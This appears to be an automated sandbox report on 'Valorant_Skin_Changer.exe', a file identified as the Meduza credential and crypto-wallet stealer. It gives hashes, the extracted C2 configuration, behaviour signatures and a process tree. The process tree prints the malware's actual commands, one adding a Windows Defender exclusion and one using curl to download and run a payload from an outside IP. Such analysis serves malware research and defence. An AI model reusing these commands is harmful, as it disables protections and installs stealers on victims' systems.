Overview

overview

10

Static

static

3

Valorant_S...er.exe

windows10-2004-x64

10

iviewers.dll

windows7-x64

8

iviewers.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/03/2025, 07:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Valorant_Skin_Changer.exe

  • Size

    201KB

  • MD5

    2696d944ffbef69510b0c826446fd748

  • SHA1

    e4106861076981799719876019fe5224eac2655c

  • SHA256

    a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

  • SHA512

    c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

  • SSDEEP

    3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb

Score
10/10
meduza1collectiondiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

meduza

Botnet

1

C2

45.93.20.15

Attributes
  • anti_dbg

    true

  • anti_vm

    true

  • build_name

    1

  • extensions

    .txt; .doc; .xlsx

  • grabber_maximum_size

    4194304

  • port

    15666

  • self_destruct

    false

Signatures

  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

    stealermeduza
  • Meduza Stealer payload 1 IoCs
  • Meduza family
    meduza
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
    collection
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Valorant_Skin_Changer.exe
    "C:\Users\Admin\AppData\Local\Temp\Valorant_Skin_Changer.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Windows\SysWOW64\curl.exe
        curl -o 1.exe http://147.45.44.170/1.exe
        3⤵
        • Downloads MZ/PE file
        PID:3884
      • C:\Windows\Temp\1.exe
        1.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:3228
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 176
      2⤵
      • Program crash
      PID:1272
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3424 -ip 3424
    1⤵
      PID:4480
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3596

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lje2brhy.eaq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Windows\Temp\1.exe
        Filesize

        1.2MB

        MD5

        40d39e1426b624e504f616d225b8e410

        SHA1

        d7e633ca620078db8656623b00dddfefc842fe35

        SHA256

        2e18b0a1b76f84de1008f468cbfb80d95258474e6fa53b20c70da9b974391c9a

        SHA512

        baf7c93d9ecec4d85923bc7f70378867a82ff8175eb5bb1b20b00121775a201431b880de067980b26af0448c6c83e706b1fb5612e91ca6fbe7f4ea11b6199e25

        Download Submit

      • memory/2708-20-0x0000000006D50000-0x0000000006D82000-memory.dmp

        Filesize

        200KB

        Download

      • memory/2708-42-0x0000000007CF0000-0x0000000007D04000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2708-4-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2708-5-0x00000000057D0000-0x00000000057F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2708-34-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2708-7-0x0000000006160000-0x00000000061C6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2708-3-0x0000000005A20000-0x0000000006048000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2708-17-0x00000000061D0000-0x0000000006524000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2708-18-0x0000000006780000-0x000000000679E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2708-19-0x00000000067C0000-0x000000000680C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2708-31-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2708-21-0x000000006F900000-0x000000006F94C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2708-2-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2708-0-0x000000007304E000-0x000000007304F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2708-6-0x00000000060F0000-0x0000000006156000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2708-33-0x0000000007780000-0x0000000007823000-memory.dmp

        Filesize

        652KB

        Download

      • memory/2708-35-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2708-36-0x00000000080F0000-0x000000000876A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2708-37-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2708-38-0x0000000007B20000-0x0000000007B2A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2708-39-0x0000000007D30000-0x0000000007DC6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2708-40-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

        Filesize

        68KB

        Download

      • memory/2708-41-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2708-32-0x0000000007750000-0x000000000776E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2708-44-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2708-45-0x0000000007DD0000-0x0000000007DD8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2708-1-0x00000000031A0000-0x00000000031D6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2708-51-0x0000000073040000-0x00000000737F0000-memory.dmp

        Filesize

        7.7MB

        Download